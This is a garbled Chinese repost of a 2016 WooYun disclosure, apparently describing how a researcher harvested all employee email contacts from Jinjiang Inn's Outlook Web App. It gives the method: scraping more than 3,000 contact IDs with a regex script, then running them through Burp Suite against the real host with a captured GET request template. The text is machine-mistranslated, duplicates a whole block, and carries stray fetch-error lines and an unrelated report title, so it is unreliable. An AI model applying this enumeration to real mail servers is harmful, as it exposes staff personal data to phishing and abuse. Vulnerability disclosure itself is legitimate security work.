锦江之星账户体系不严导致集团全部人员邮箱泄露(附outlook联系人下载办法)
漏洞标题 锦江之星账户体系不严导致集团全部人员邮箱泄露(附outlook联系人下载办法) 相关厂商 锦江之星旅馆有限公司 漏洞作者 路人甲 提交时间 2016-04-23 00:54 公开时间 201…
Failure when receiving data from the peer
下面的重点是outlook Web应用程序的联系人导出问题。
这个问题,[电子邮件 保护]/*丹尼尔,他告诉我看看这个
WooYun:视频网站安全优酷土豆帐户系统控制不严,导致内网漫游(涉及后台\云平台主站\内部商城完整源代码\ 100服务器权限和数据库信息等)
每个联系人都有一个特殊ID,如下所示
按组,查找所有员工并将页面保存到本地
https://mail.jj-inn.com/owa/?ae=Item&a=Open&t=ADDistList&id=K15rPYxhC0OQKMpSvP7uPw%3d%3d&pspid=_1461300333450_341817680
自己编写一个脚本,使用正则表达式提取id,总共超过3000个id
由于它不是很好,尝试使用脚本访问https,它是错误的,并且验证设置为False。
这条路是密封的,我们有其他道路,Burp套件,设置变量,建议id进入打嗝,开始运行
页面获取包
GET/owa/?ae=Item&a=Open&t=AD.RecipientType.User&id=§xvJJGKCHR0ayfdGVbJhkvw%3d%3d§&pspid=_1461299763468_260363118HTTP/1.1
主机: mail.jj-inn.com
连接:保持活动状态
高速缓存控制: max-age=0
接受: text/html,application/xhtml + xml,application/xml; q=0.9,image/webp,*/*; q=0.8
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/42.0.2311.154 Safari/537.36 LBBROWSER
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh; q=0.8
Failure when receiving data from the peer
按组,查找所有员工并将页面保存到本地
https://mail.jj-inn.com/owa/?ae=Item&a=Open&t=ADDistList&id=K15rPYxhC0OQKMpSvP7uPw%3d%3d&pspid=_1461300333450_341817680
自己编写一个脚本,使用正则表达式提取id,总共超过3000个id
由于它不是很好,尝试使用脚本访问https,它是错误的,并且验证设置为False。
这条路是密封的,我们有其他道路,Burp套件,设置变量,建议id进入打嗝,开始运行
页面获取包
GET/owa/?ae=Item&a=Open&t=AD.RecipientType.User&id=§xvJJGKCHR0ayfdGVbJhkvw%3d%3d§&pspid=_1461299763468_260363118HTTP/1.1
主机: mail.jj-inn.com
连接:保持活动状态
高速缓存控制: max-age=0
接受: text/html,application/xhtml + xml,application/xml; q=0.9,image/webp,*/*; q=0.8
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/42.0.2311.154 Safari/537.36 LBBROWSER
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh; q=0.8
Failure when receiving data from the peer
- 发表于 2016-07-17 08:00
- 阅读 ( 449 )
- 分类:黑客技术
